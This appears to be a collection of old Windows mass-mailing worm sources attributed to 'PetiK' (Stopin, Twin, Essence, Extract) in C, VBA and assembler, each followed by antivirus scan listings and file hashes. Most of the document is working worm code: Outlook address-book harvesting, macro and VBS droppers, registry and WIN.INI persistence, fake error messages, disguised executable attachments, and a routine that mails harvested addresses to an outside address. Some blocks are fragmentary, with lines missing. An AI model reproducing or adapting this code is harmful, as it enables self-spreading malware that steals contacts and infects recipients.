mess.lpRecips->ulRecipClass=MAPI_TO;
mess.nRecipCount=1;
mess.lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc));
if(!mess.lpFiles)
return;
memset(mess.lpFiles,0,sizeof(MapiFileDesc));
mess.lpFiles->lpszPathName=filename;
mess.lpFiles->lpszFileName="My_Work.exe";
mess.nFileCount=1;
mess.lpOriginator=&from;
mSendMail(0,0,&mess,0,0);
free(mess.lpRecips);
free(mess.lpFiles);
}
void FeedBack()
{
GetSystemTime(&systime);
switch(systime.wDay) {
case 7:
MessageBox(NULL,"It is not with a B-52 that you will stop terrorist groups.\n"
"With this, you stop the life of women and children.",
"Message to USA",MB_OK|MB_ICONHAND);
break;
case 11:
dc=GetDC(NULL);
if(dc)
{
TextOut(dc,300,300,"Can we try to stop the conflicts ? YES OF COURSE !",50);
}
ReleaseDC(NULL,dc);
break;
case 28:
stopv=fopen("StopIntifada.htm","w");
fprintf(stopv,"<html><head><title>Stop Violence between Palestinians and
Israeli</title></head>\n");
fprintf(stopv,"<body bgcolor=blue text=yellow>\n");
fprintf(stopv,"<p align=\"center\"><font size=\"5\">HOW TO STOP THE
VIOLENCE</font></p><BR>\n");
fprintf(stopv,"<p align=\"left\"><font size=\"3\">-THE ISRAELIS:</font><BR>\n");
fprintf(stopv,"<font>To take the israelis tank out of the palestinians autonomous
city.</font><BR>\n");
fprintf(stopv,"<font>Don't bomb civil place after a terrorist bomb
attack.</font><BR>\n");
fprintf(stopv,"<font>To arrest and to kill the leaders of terrorist
groups.</font><BR><BR>\n");
fprintf(stopv,"<font>-THE PALESTINIANS:</font><BR>\n");
fprintf(stopv,"<font>To stop to provoke the israelis army.</font><BR>\n");
fprintf(stopv,"<font>To stop the terrorist attacks.</font><BR><BR>\n");
fprintf(stopv,"<font>-THE BOTH:</font><BR>\n");
fprintf(stopv,"<font>To try to accept the other people.</font><BR>\n");
fprintf(stopv,"<font>TO ORGANIZE A MEETING BETWEEN ARIEL SHARON AND YASSER ARAFAT !
</font><BR><BR>\n");
fprintf(stopv,"<font>Thanx to read this.</font></p>\n");
fprintf(stopv,"</body></html>");
fclose(stopv);
ShellExecute(NULL,"open","StopIntifada.htm",NULL,NULL,SW_SHOWMAXIMIZED);
break;
}
}
File SingLung.exe received on 05.16.2009 19:40:32 (CET)

AntiVir 7.9.0.168 2009.05.15 Worm/Stopin.A
Authentium 5.1.2.4 2009.05.16 -
Avast 4.8.1335.0 2009.05.15 Win32:Stopin
AVG 8.5.0.336 2009.05.15 I-Worm/Stopin
BitDefender 7.2 2009.05.16 Win32.StopIn.A@mm
CAT-QuickHeal 10.00 2009.05.15 I-Worm.Stopin.a
ClamAV 0.94.1 2009.05.16 W32.Stopin.b
Comodo 1157 2009.05.08 Worm.Win32.Stopin.B
DrWeb 5.0.0.12182 2009.05.16 Win32.HLLM.Stopin.60928
eSafe 7.0.17.0 2009.05.14 Win32.Stopin.a
eTrust-Vet 31.6.6508 2009.05.16 Win32/Stopin.B
F-Prot 4.4.4.56 2009.05.16 -
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Stopin.a
Fortinet 3.117.0.0 2009.05.16 W32/Stopin.B
GData 19 2009.05.16 Win32.StopIn.A@mm
K7AntiVirus 7.10.737 2009.05.16 Email-Worm.Win32.Stopin.a
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Stopin.a
McAfee 5616 2009.05.15 W32/Stopin.b@MM
McAfee+Artemis 5616 2009.05.15 W32/Stopin.b@MM
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Stopin.A
Microsoft 1.4602 2009.05.16 Worm:Win32/Petick.W@mm
NOD32 4080 2009.05.15 Win32/Stopin.B
Norman 6.01.05 2009.05.16 W32/Stopin.A
Panda 10.0.0.14 2009.05.16 W32/Stopin.A
PCTools 4.4.2.0 2009.05.16 I-Worm.Stopin.A
Rising 21.29.52.00 2009.05.16 Worm.Singlung.a
Sophos 4.41.0 2009.05.16 W32/Stopin-A
Sunbelt 3.2.1858.2 2009.05.16 Email-Worm.Win32.Stopin.a
TheHacker 6.3.4.1.326 2009.05.15 W32/Stopin.a
TrendMicro 8.950.0.1092 2009.05.15 PAK_Generic.001
VBA32 3.12.10.5 2009.05.16 Win32.HLLW.Stopin
ViRobot 2009.5.15.1737 2009.05.15 I-Worm.Win32.Stopin
VirusBuster 4.6.5.0 2009.05.16 I-Worm.Stopin.A
MD5...: 460f48b7d7bde2517c1a9a9042682f28
SHA1..: f6ced460439e443aa957c2765328f3b99dcdd252
' Name : W97M-W32.Twin
' Author : PetiK
' Language : VBA Word & Assembler
' Date : 01/02/2002
' Size : 2701 byte
Attribute VBA_ModuleType=VBAModule
Sub twin
Sub AutoOpen()
win = Environ("windir")
thisfile = ActiveDocument.Name
full = ActiveDocument.FullName
MsgBox "This file has some problems", vbCritical, thisfile
e = "exe="""
e = e + "4D5A50000200000..."
e = e + "000...000000000000"
e = e + "0000000000"
e = e + """"
f = "fso.CopyFile """
f = f + full
f = f + """, win&""\NetInfo.doc"""
Open "C:\Twin.vbs" For Output As #1
Print #1, "On Error Resume Next"
Print #1, "Set fso=CreateObject(""Scripting.FileSystemObject"")"
Print #1, "Set w=CreateObject(""WScript.Shell"")"
Print #1, "Set win=fso.GetSpecialFolder(0)"
Print #1, "Set Twin=CreateObject(""Outlook.Application"")"
Print #1, "Set deux=Twin.GetNameSpace(""MAPI"")"
Print #1, "Set c=fso.CreateTextFile(""C:\backup.win"")"
Print #1, "c.Close"
Print #1, "For Each polux In deux.AddressLists"
Print #1, "If polux.AddressEntries.Count <> 0 Then"
Print #1, "For jumeaux = 1 To polux.AddressEntries.Count"
Print #1, "Set castor = polux.AddressEntries(jumeaux)"
Print #1, "Set c=fso.OpenTextFile(""C:\backup.win"",8,true)"
Print #1, "c.WriteLine castor.Address"
Print #1, "c.Close"
Print #1, "Next"
Print #1, "End If"
Print #1, "Next"
Print #1, "Set c=fso.OpenTextFile(""C:\backup.win"",8,true)"
Print #1, "c.WriteLine ""#"""
Print #1, "c.Close"
Print #1, ""
Print #1, e
Print #1, "lire=decr(exe)"
Print #1, "Set exfile=fso.CreateTextFile(win&""\AVW32.exe"",true)"
Print #1, "exfile.Write lire"
Print #1, "exfile.Close"
Print #1, f
Print #1, "w.Run win&""\AVW32.exe"", 1, False"
Print #1, "Function decr(octet)"
Print #1, "For hexa = 1 To Len(octet) Step 2"
Print #1, "decr = decr & Chr(""&h"" & Mid(octet, hexa, 2))"
Print #1, "Next"
Print #1, "End Function"
Close #1
Shell "wscript C:\Twin.vbs", vbHide
End Sub
Sub HelpAbout()
.Visible = True
End With
.Text = "Message for " & Application.UserName & vbCrLf & "How Are You"
.Heading = "W97M/W32ASM.Twin.Worm"
.Animation = msoAnimationSendingMail
.Show
End With
End Sub
End Sub
W32 ASM CODE OF THE HEX FILE INTO WORD DOCUMENT
comment #
Name : I-Worm.Twin
Author : PetiK
Date : January 30th 2002 - February 1st 2002
Size : 6656 bytes
Action : See yourself. It's not complex.

#
.586p
.model flat
.code
JUMPS
api macro a
extrn a:proc
call a
endm
include useful.inc
start: push 50
push esi
push 0
push 25
push esi
push 1
@pushsz "AntiVirus Freeware"
push 80000002h
api SHSetValueA
@pushsz "C:\twin.vbs"
api DeleteFileA
push 50
push offset pathname
@pushsz "\NetInfo.doc"
push offset pathname
api lstrcat
verif_inet:
push 0
push offset inet
dec eax
jnz verif_inet
push 0
push 0
push 3
push 0
push 1
push 80000000h
@pushsz "C:\backup.win"
api CreateFileA
inc eax
je end_worm
dec eax
xchg ebx,eax
push 0
push 0
push 0
push 2
push 0
push ebx
test eax,eax
je end_w1
xchg eax,ebp
push 0
push 0
push 0
push 4
push ebp
api MapViewOfFile
test eax,eax
je end_w2
xchg eax,esi
push 0
push ebx
api GetFileSize
cmp eax,3
jbe end_w3
scan_mail:
xor edx,edx
push edi
p_c: lodsb
cmp al," "
je car_s
cmp al,0dh
je entr1
cmp al,0ah
je entr2
cmp al,"#"
je f_mail
cmp al,'@'
jne not_a
inc edx
not_a: stosb
jmp p_c
car_s: inc esi
jmp p_c
entr1: xor al,al
stosb
pop edi
test edx,edx
je scan_mail
call send_mail
jmp scan_mail
entr2: xor al,al
stosb
pop edi
jmp scan_mail
f_mail:
end_w3: push esi

api UnmapViewOfFile
end_w2: push ebp
api CloseHandle
end_w1: push ebx
api CloseHandle
end_worm:
push 0
api ExitProcess
send_mail:
xor eax,eax
push eax
push eax
push offset Message
push eax
push [sess]
api MAPISendMail
ret
.data
pathname db 50 dup (0)
inet dd 0
sess dd 0
subject db "A comical story for you.",0

body db "I send you a comical story found on the Net.",0dh,0ah,0dh,0ah
db 9,"Best Regards. You friend.",0
filename db "comical_story.doc",0
Message dd ?
dd offset subject
dd offset body
dd ?
dd ?
dd ?
dd 2
dd offset MsgFrom
dd 1
dd offset MsgTo
dd 1
dd offset Attach
MsgFrom dd ?
dd ?
dd ?
dd ?
dd ?
dd ?
MsgTo dd ?
dd 1
dd offset mail_addr
dd offset mail_addr
dd ?
dd ?
Attach dd ?
dd ?
dd ?
dd offset pathname
dd offset filename
dd ?
end start
end
MODULE VBA TWIN IN WORD DOCUMENT

File Twin.exe received on 05.16.2009 19:41:08 (CET)

AhnLab-V3 5.0.0.2 2009.05.16 Win32/Comical.worm.6656
Authentium 5.1.2.4 2009.05.16 W32/Malware!2f2b
Avast 4.8.1335.0 2009.05.15 Win32:Comical
AVG 8.5.0.336 2009.05.15 W97M/Comical.EXE
BitDefender 7.2 2009.05.16 Win32.Comical.A@mm
ClamAV 0.94.1 2009.05.16 -
Comodo 1157 2009.05.08 Worm.Win32.Comical.A
DrWeb 5.0.0.12182 2009.05.16 Win32.Petik.8192
eTrust-Vet 31.6.6508 2009.05.16 Win32/Comical.A
F-Prot 4.4.4.56 2009.05.16 W32/Malware!2f2b
Fortinet 3.117.0.0 2009.05.16 W32/Petik.PL@mm
GData 19 2009.05.16 Win32.Comical.A@mm
McAfee 5616 2009.05.15 W32/Comical@MM
McAfee+Artemis 5616 2009.05.15 W32/Comical@MM
Microsoft 1.4602 2009.05.16 Worm:Win32/Comical.A@mm
NOD32 4080 2009.05.15 Win32/Comical.A
Norman 6.01.05 2009.05.16 W32/Petik.AR
Panda 10.0.0.14 2009.05.16 Worm Generic
PCTools 4.4.2.0 2009.05.16 I-Worm.Conical.A
Rising 21.29.52.00 2009.05.16 Worm.Mail.Petik.h
Sophos 4.41.0 2009.05.16 W32/Comical-A
Sunbelt 3.2.1858.2 2009.05.16 W32.Comical@mm
Symantec 1.4.4.12 2009.05.16 W32.Comical@mm
TheHacker 6.3.4.1.326 2009.05.15 W32/Comical@MM
TrendMicro 8.950.0.1092 2009.05.15 WORM_COMICAL.A
VBA32 3.12.10.5 2009.05.16 Win32.Worm.Twin
ViRobot 2009.5.15.1737 2009.05.15 -
VirusBuster 4.6.5.0 2009.05.16 I-Worm.Conical.A
MD5...: 3da254ab9def856d64f0779ea6a6057f
SHA1..: 31a005985a793d2b8e84dd747c3fa17c721ddf60
File Twin.doc received on 05.16.2009 19:41:06 (CET)

AhnLab-V3 5.0.0.2 2009.05.16 W97M/Comical
AntiVir 7.9.0.168 2009.05.15 W2000M/Comical.A@mm
Authentium 5.1.2.4 2009.05.16 W97M/Comical.A@mm
Avast 4.8.1335.0 2009.05.15 MW97:Comical-A
AVG 8.5.0.336 2009.05.15 W97M/Comical
BitDefender 7.2 2009.05.16 Win32.Comical.A(W97M)
CAT-QuickHeal 10.00 2009.05.15 -
ClamAV 0.94.1 2009.05.16 -
DrWeb 5.0.0.12182 2009.05.16 W97M.Petik
eSafe 7.0.17.0 2009.05.14 O97M.GNsm
eTrust-Vet 31.6.6508 2009.05.16 W97M/Comical.A:mm
F-Prot 4.4.4.56 2009.05.16 W97M/Comical.A@mm
Fortinet 3.117.0.0 2009.05.16 W97M/Comical.A@mm
GData 19 2009.05.16 Win32.Comical.
K7AntiVirus 7.10.737 2009.05.16 Macro.Comical
McAfee 5616 2009.05.15 W97M/Comical@MM
McAfee+Artemis 5616 2009.05.15 W97M/Comical@MM
McAfee-GW-Edition 6.7.6 2009.05.15 Macro.Comical.A
Microsoft 1.4602 2009.05.16 Virus:W97M/Comical.A@mm
NOD32 4080 2009.05.15 W97M/Comical.A
Norman 6.01.05 2009.05.16 W97M/Comical.A@mm
nProtect 2009.1.8.0 2009.05.16 Win32.Comical.A(W97M)
Panda 10.0.0.14 2009.05.16 W97M/Generic
PCTools 4.4.2.0 2009.05.16 WORD.97.Conical.A
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 Unknown Micro Virus
Sophos 4.41.0 2009.05.16 WM97/Comical-A
Sunbelt 3.2.1858.2 2009.05.16 -
Symantec 1.4.4.12 2009.05.16 W97M.Comical@mm
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 W97M_COMICAL.A
VBA32 3.12.10.5 2009.05.16 Virus.W97M.Petik
ViRobot 2009.5.15.1737 2009.05.15 W97M.Comical.A
VirusBuster 4.6.5.0 2009.05.16 WORD.97.Conical.A
MD5...: 079275bdaf0058642f3b062b3aef4de3
SHA1..: 0fe4a31077176828ec545b7ca3c5e92ea59a7352
SHA256: 46a11a3b520a234a4408010d57a0bd28589526f3248e16fc71ccf4cf8db31595
/*
Name : I-Worm.Essence
Author : PetiK
Date : February 3rd 2002
Language : C++
Thanx to Bumblebee.
*/
#include <mapi.h>
#include <memory.h>
#pragma argused
void Welcome();
void attachname();
void sendmail(LHANDLE sess, char *msubject, char *mbody, char *mailaddr);
char filename[100],sysdir[100],sysdr[100],attname[20];
LPSTR Run="Software\\Microsoft\\Windows\\CurrentVersion\\Run";
HINSTANCE hMAPI;
LHANDLE sess;
MapiMessage *mess;
char messId[512];
char subject[1024],
address[1024],
server[1024],
body[8192];
long i,j;
char *tmp;
MSG msg;
HKEY hReg;

ULONG (PASCAL FAR *mSaveMail)(LHANDLE, ULONG, lpMapiMessage, FLAGS, ULONG, LPTSTR);
{
strcat(sysdr,"\\MSIE32.EXE");
if((lstrcmp(filename,sysdr))!=0) {
Welcome();
strcat(sysdir,"\\Msie32.exe");
CopyFile(filename,sysdir,FALSE);
RegSetValueEx(hReg,"Microsoft IE",0,REG_SZ,(BYTE *)sysdir,100);
RegCloseKey(hReg);
// WriteProfileString("WINDOWS","RUN",sysdir);
// WriteProfileString(NULL,NULL,NULL);
return 0;
}
if(!hMAPI)
return -1;
if(!mLogon)
return -1;
if(!mLogoff)
return -1;
if(!mFindNext)
return -1;
if(!mReadMail)
return -1;
(FARPROC &)mSaveMail=GetProcAddress(hMAPI, "MAPISaveMail");
if(!mSaveMail)
return -1;
if(!mSendMail)
return -1;
if(!mFreeBuffer)
return -1;
mLogon(NULL,NULL,NULL,MAPI_NEW_SESSION,NULL,&sess);
SetThreadPriority(NULL,THREAD_PRIORITY_LOWEST);
while(GetMessage(&msg,NULL,0,0))
if(mFindNext(sess,0,NULL,NULL,MAPI_LONG_MSGID|
MAPI_UNREAD_ONLY,NULL,messId)==SUCCESS_SUCCESS) {
do {
if(mReadMail(sess,NULL,messId,MAPI_ENVELOPE_ONLY|
if(lstrlen(mess->lpszSubject)>2)
if(mess->lpszSubject[strlen(mess->lpszSubject)-1]!=' ' && mess-
>lpszSubject[strlen(mess->lpszSubject)-2]!=' ') {
mFreeBuffer(mess);
SetThreadPriority(NULL,THREAD_PRIORITY_HIGHEST);
if(mReadMail(sess,NULL,messId,MAPI_SUPPRESS_ATTACH|
body[0]=0;
if(mess->lpszNoteText) {
wsprintf(body,"Hi '%s', you wrote me :\n##########\n- ",mess-
>lpOriginator->lpszName);
for(i=0,j=lstrlen(body);i<lstrlen(mess->lpszNoteText) && j<512;i++,j++) {
body[j]=mess->lpszNoteText[i];
if(body[j]=='\n') {
body[j]=0;
lstrcat(body,"\n- ");
j+=2;
}
}
body[j]=0;
}
for(i=0;j<lstrlen(address) && address[i]!='@';i++);
if(i>lstrlen(address))
wsprintf(body,"smtp.%s",address+i+1);
else
wsprintf(body,"smtp.yahoo.com");
if(j>=512)
lstrcat(body,"...");
else
lstrcat(body," ");
wsprintf(body+strlen(body),"\n##########\n\n %s auto-reply:\n\n",server);
lstrcat(body,"I can not reply now.\nLook at this attachment and mail me if
you have some suggests.\n\n");
wsprintf(subject,"Re: %s ",mess->lpszSubject);
wsprintf(address,"%s",mess->lpOriginator->lpszAddress);
MessageBox(NULL,body,subject,MB_OK|MB_ICONINFORMATION);
sendmail(sess,subject,body,address);
tmp=(char *)malloc(strlen(mess->lpszSubject)+3);
strcpy(tmp,mess->lpszSubject);
free(mess->lpszSubject);
tmp[strlen(tmp)+2]=0;
tmp[strlen(tmp)]=' ';
tmp[strlen(tmp)-1]=' ';
mess->lpszSubject=tmp;
mSaveMail(sess,NULL,mess,MAPI_LONG_MSGID,NULL,messId);
mFreeBuffer(mess);
SetThreadPriority(NULL,THREAD_PRIORITY_LOWEST);
}
} else
mFreeBuffer(mess);
}
} while(mFindNext(sess,0,NULL,messId,MAPI_LONG_MSGID|
MAPI_UNREAD_ONLY,NULL,messId)==SUCCESS_SUCCESS);
}
mLogoff(sess,0,0,0);
FreeLibrary(hMAPI);
}
void sendmail(LHANDLE sess, char *msubject, char *mbody, char *mailaddr)
{
char *name[]={"readme","clickme","lookthis","urgent","newgame","winanholiday",
"hello","ForU","important"};
char *ext1[]={".mp3",".htm",".jpg",".gif",".html",".mpeg",".mpg",".htm",".vbs",
".zip",".rar"};
char *ext2[]={".exe",".com",".pif",".scr"};
attname[0]=0;
strcat(attname,name[GetTickCount()&8]);
strcat(attname,ext1[GetTickCount()&10]);
strcat(attname,ext2[GetTickCount()&3]);
MapiMessage mes;
MapiRecipDesc from;
memset(&mes,0,sizeof(MapiMessage));
from.lpszName=NULL;
mes.lpszSubject=msubject;
mes.lpszNoteText=mbody;
mes.lpRecips=(MapiRecipDesc *)malloc(sizeof(MapiRecipDesc));
if(!mes.lpRecips)
return;
memset(mes.lpRecips,0,sizeof(MapiRecipDesc));
mes.lpRecips->lpszName=mailaddr;
mes.lpRecips->lpszAddress=mailaddr;
mes.lpRecips->ulRecipClass=MAPI_TO;
mes.nRecipCount=1;
mes.lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc));
if(!mes.lpFiles)
return;
memset(mes.lpFiles,0,sizeof(MapiFileDesc));
mes.lpFiles->lpszPathName=filename;
mes.lpFiles->lpszFileName=attname;
mes.nFileCount=1;
mes.lpOriginator=&from;
mSendMail(sess,0,&mes,0,0);
free(mes.lpRecips);
free(mes.lpFiles);
}
void Welcome()
{
Sleep(750);
MessageBox(NULL,"Software installed on the system.","SETUP",MB_OK|MB_ICONINFORMATION);
}
File Essence.scr received on 05.16.2009 11:31:23 (CET)
AntiVir 7.9.0.168 2009.05.15 Worm/Stopin.C
Avast 4.8.1335.0 2009.05.15 Win32:Stopin-B
AVG 8.5.0.336 2009.05.15 I-Worm/Stopin
BitDefender 7.2 2009.05.16 Win32.StopIn.B@mm
CAT-QuickHeal 10.00 2009.05.15 I-Worm.Stopin.c
ClamAV 0.94.1 2009.05.15 Worm.Stopin.C
Comodo 1157 2009.05.08 Worm.Win32.Stopin.C
DrWeb 5.0.0.12182 2009.05.16 Win32.HLLM.Stopin.50688
eSafe 7.0.17.0 2009.05.14 Win32.Stopin.c
eTrust-Vet 31.6.6508 2009.05.16 Win32/Stopin.A
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Stopin.c
Fortinet 3.117.0.0 2009.05.16 W32/Stopin.C!worm
GData 19 2009.05.16 Win32.StopIn.B@mm
K7AntiVirus 7.10.735 2009.05.14 Email-Worm.Win32.Stopin.c
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Stopin.c
McAfee 5616 2009.05.15 W32/Stopin.c@MM
McAfee+Artemis 5616 2009.05.15 W32/Stopin.c@MM
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Stopin.C
Microsoft 1.4602 2009.05.16 Worm:Win32/Stopin.C@mm
NOD32 4080 2009.05.15 Win32/Stopin.C
Norman 6.01.05 2009.05.16 W32/Stopin.C@mm
Panda 10.0.0.14 2009.05.15 W32/Stopin.C
PCTools 4.4.2.0 2009.05.15 I-Worm.Stopin.C
Rising 21.29.52.00 2009.05.16 Worm.Stopin.c
Sophos 4.41.0 2009.05.16 W32/Stopin-B
Sunbelt 3.2.1858.2 2009.05.16 Email-Worm.Win32.Stopin.c
TheHacker 6.3.4.1.326 2009.05.15 W32/Stopin.c
TrendMicro 8.950.0.1092 2009.05.15 WORM_STOPIN.B
VBA32 3.12.10.5 2009.05.16 Win32.HLLW.Essence
ViRobot 2009.5.15.1737 2009.05.15 I-Worm.Win32.Stopin.C
VirusBuster 4.6.5.0 2009.05.15 I-Worm.Stopin.C
MD5...: c5ca2b9bea18766448b54c7ecd4c887c
SHA1..: 108ca819544e528b345e8afbc561b1ecda720102
comment #
Name : I-Worm.Extract
Author : PetiK
Date : February 3rd 2002 - February 4th 2002
Size : 5632
Action :
Extract API from DLL directly (the reason of the name of worm)
Copy itself to %SYSDIR%\UPDATEW32.EXE
Create "RUN=" in WIN.INI to start with computer
Display fake message
Send to extractcounter@multimania.com the WAB of Outlook
Take theses adresses to sread itself with MAPI functions.
On 29th display a message box
.586p
.model flat
.code
JUMPS
api macro a
extrn a:proc
call a
endm
include Useful.inc
start_worm:
@pushsz "KERNEL32.DLL"
xchg eax,ebx
kern macro x
push offset sz&x
push ebx
api GetProcAddress
mov _ptk&x,eax
endm
kern CloseHandle
kern CopyFileA
kern CreateDirectoryA
kern CreateFileA
kern CreateFileMappingA
kern DeleteFileA
kern GetDateFormatA
kern GetFileSize
kern GetModuleFileNameA
kern GetSystemDirectoryA
kern GetSystemTime
kern GetTimeFormatA
kern GetWindowsDirectoryA
kern lstrcat
kern lstrcmp
kern lstrcpy
kern lstrlen
kern MapViewOfFile
kern SetCurrentDirectoryA
kern Sleep
kern UnmapViewOfFile
kern WinExec
kern WriteFile
kern WriteProfileStringA
kern WritePrivateProfileStringA
push 50
push esi
push 0
call _ptkGetModuleFileNameA
push 50
push offset verif_worm
call _ptkGetSystemDirectoryA
@pushsz "\UPDATEW32.EXE"
call _ptklstrcat
push esi
call _ptklstrcmp
test eax,eax
jz continue_worm

push edi
push 50
push edi
add edi,eax
mov eax,"dpU\"
stosd
mov eax,"Weta"
stosd
mov eax,"e.23"
stosd
mov eax,"ex"
stosd
pop edi
copy_w: push 0
push edi
push esi
call _ptkCopyFileA
run_w: push edi

@pushsz "RUN"
@pushsz "WINDOWS"
call _ptkWriteProfileStringA
call CreateDate
push 50
push offset realname
push offset orig_worm
api GetFileTitleA
@pushsz " - "

push offset date
call _ptklstrcat
push offset realname
push offset date
call _ptklstrcat
f_mess: push 10h

push offset date
call @mess
db "Cannot Open this File !",CRLF,CRLF
db "If you downloaded this file, try downloading again.",0
@mess:
push 0
api MessageBoxA
jmp end_worm
continue_worm:
push 50
push offset vbsfile
call _ptkGetWindowsDirectoryA
@pushsz "\ExtractVbs.vbs"
push offset vbsfile
call _ptklstrcat
push 0
push 20h
push 2
push 0
push 1
push 40000000h
push offset vbsfile
call _ptkCreateFileA
xchg eax,ebx
push 0
push offset octets
push e_vbs - s_vbs
push offset s_vbs
push ebx
call _ptkWriteFile
push ebx
call _ptkCloseHandle
push offset vbsfile

push offset vbsexec
call _ptklstrcpy
push 4
push offset execcontrol
call _ptkWinExec
push 5000
call _ptkSleep
push offset vbsfile
call _ptkDeleteFileA
payload:
push offset Systime
call _ptkGetSystemTime
cmp [Systime.wDay],29
jne end_pay
push 40h
@pushsz "I-Worm.Extract"
call e_mess
db "Hi man, you received my worm !",CRLF
db "Don't panic, it doesn't format your computer",CRLF,CRLF
db 9,"Bye and Have a Nice Day.",0
e_mess:
push 0
api MessageBoxA
end_pay:
sh_gsf: push 0
push 5
push offset progra
push 0
push offset progra
call _ptkSetCurrentDirectoryA
@pushsz "Update Windows 32bits"
call _ptkCreateDirectoryA
@pushsz "\Update Windows 32bits"
push offset progra
call _ptklstrcat
push offset progra
push 0
@pushsz "MAJ.exe"
call _ptkCopyFileA
verif_inet:
push 0
push offset inet
dec eax
jnz verif_inet
push 50
push offset winpath
push offset winpath
spread: pushad
push 00h
push 80h
push 03h
push 00h
push 01h
push 80000000h
@pushsz "Outlook_Addr.txt"
inc eax
je end_spread
dec eax
xchg eax,ebx
xor eax,eax
push eax
push eax
push eax
push 2
push eax
push ebx
call _ptkCreateFileMappingA
test eax,eax
je end_s1
xchg eax,ebp
xor eax,eax
push eax
push eax
push eax
push 4
push ebp
call _ptkMapViewOfFile
test eax,eax
je end_s2
xchg eax,esi
push 0
push ebx
call _ptkGetFileSize
cmp eax,4
jbe end_s3
scan_mail:
xor edx,edx
push edi
p_c: lodsb
cmp al," "
je car_s
cmp al,";"
je end_m
cmp al,"#"
je f_mail
cmp al,'@'
jne not_a
inc edx
not_a: stosb
jmp p_c
car_s: inc esi
jmp p_c
end_m: xor al,al
stosb
pop edi
test edx,edx
je scan_mail
call send_mail
jmp scan_mail
f_mail:
end_s3: push esi

call _ptkUnmapViewOfFile
end_s2: push ebp
end_s1: push ebx
end_spread: popad
end_worm:
push 0
api ExitProcess
send_mail:
call CreateDate
call CreateTime
@pushsz "C:\liste.ini"
push offset mail_addr
push offset time
push offset date
call _ptkWritePrivateProfileStringA
xor eax,eax
push eax
push eax
push offset Message
push eax
push [sess]
api MAPISendMail
ret
CreateDate Proc
pushad
mov edi,offset date
push 32
push edi
@pushsz "dddd, dd MMMM yyyy"
push 0
push 0
push 9
call _ptkGetDateFormatA
popad
ret
CreateDate EndP
CreateTime Proc
pushad
mov edi,offset time
push 32
push edi
@pushsz "HH:mm:ss"
push 0
push 0
push 9
call _ptkGetTimeFormatA
popad
ret
CreateTime EndP
.data
verif_worm db 50 dup (0)
vbsfile db 50 dup (0)
winpath db 50 dup (0)
progra db 50 dup (0)
realname db 50 dup (0)
date db 30 dup (?)
time db 9 dup (?)
octets dd ?
inet dd 0
sess dd 0
subject db "Re: Check This...",0
body db "Hi",CRLF
db "This is the file you ask for. Open quickly ! It's very
important",CRLF,CRLF
db 9,"Best Regards",CRLF,CRLF,CRLF
db "Salut,",CRLF
db "Voici le fichier que tu cherches. Ouvre vite ! C'est très
important",CRLF,CRLF
db 9,"Mes sincères salutations",0
filename db "important.exe",0
Message dd ?
dd offset subject
dd offset body
dd ?
dd ?
dd ?
dd 2
dd offset MsgFrom
dd 1
dd offset MsgTo
dd 1
dd offset Attach
MsgFrom dd ?
dd ?
dd ?
dd ?
dd ?
dd ?
MsgTo dd ?
dd 1
dd offset mail_addr
dd offset mail_addr
dd ?
dd ?
Attach dd ?
dd ?
dd ?
dd offset orig_worm
dd offset filename
dd ?
szCloseHandle db "CloseHandle",0
szCopyFileA db "CopyFileA",0
szCreateDirectoryA db "CreateDirectoryA",0
szCreateFileA db "CreateFileA",0
szCreateFileMappingA db "CreateFileMappingA",0
szDeleteFileA db "DeleteFileA",0
szGetDateFormatA db "GetDateFormatA",0
szGetFileSize db "GetFileSize",0
szGetModuleFileNameA db "GetModuleFileNameA",0
szGetSystemDirectoryA db "GetSystemDirectoryA",0
szGetSystemTime db "GetSystemTime",0
szGetTimeFormatA db "GetTimeFormatA",0
szGetWindowsDirectoryA db "GetWindowsDirectoryA",0
szlstrcat db "lstrcat",0
szlstrcmp db "lstrcmp",0
szlstrcpy db "lstrcpy",0
szlstrlen db "lstrlen",0
szMapViewOfFile db "MapViewOfFile",0
szSetCurrentDirectoryA db "SetCurrentDirectoryA",0
szSleep db "Sleep",0
szUnmapViewOfFile db "UnmapViewOfFile",0
szWinExec db "WinExec",0
szWriteFile db "WriteFile",0
szWritePrivateProfileStringA db "WritePrivateProfileStringA",0
szWriteProfileStringA db "WriteProfileStringA",0
_ptkCloseHandle dd ?
_ptkCopyFileA dd ?
_ptkCreateDirectoryA dd ?
_ptkCreateFileA dd ?
_ptkCreateFileMappingA dd ?
_ptkDeleteFileA dd ?
_ptkGetDateFormatA dd ?
_ptkGetFileSize dd ?
_ptkGetModuleFileNameA dd ?
_ptkGetSystemDirectoryA dd ?
_ptkGetSystemTime dd ?
_ptkGetTimeFormatA dd ?
_ptkGetWindowsDirectoryA dd ?
_ptklstrcat dd ?
_ptklstrcmp dd ?
_ptklstrcpy dd ?
_ptklstrlen dd ?
_ptkMapViewOfFile dd ?
_ptkSetCurrentDirectoryA dd ?
_ptkSleep dd ?
_ptkUnmapViewOfFile dd ?
_ptkWinExec dd ?
_ptkWriteFile dd ?
_ptkWriteProfileStringA dd ?
_ptkWritePrivateProfileStringA dd ?

db 'Set f=CreateObject("Scripting.FileSystemObject")',CRLF
db 'Set win=f.GetSpecialFolder(0)',CRLF
db 'Set c=f.CreateTextFile(win&"\Outlook_Addr.txt")',CRLF
db 'c.Close',CRLF
db 'Set out=CreateObject("Outlook.Application")',CRLF
db 'Set mapi=out.GetNameSpace("MAPI")',CRLF
db 'adr="extractcounter@multimania.com"',CRLF
db 'For Each mail in mapi.AddressLists',CRLF
db 'If mail.AddressEntries.Count <> 0 Then',CRLF
db 'For O=1 To mail.AddressEntries.Count',CRLF
db 'adr=adr &";"& mail.AddressEntries(O).Address',CRLF
db 'Next',CRLF
db 'End If',CRLF
db 'Next',CRLF
db 'adr=adr &";#"',CRLF,CRLF
db 'Set c=f.OpenTextFile(win&"\Outlook_Addr.txt",2)',CRLF
db 'c.WriteLine adr',CRLF
db 'c.Close',CRLF
e_vbs:
execcontrol db "wscript "

vbsexec db 50 dup (0)
db "",0
end start_worm
end
File Extract.exe received on 05.16.2009 11:58:04 (CET)

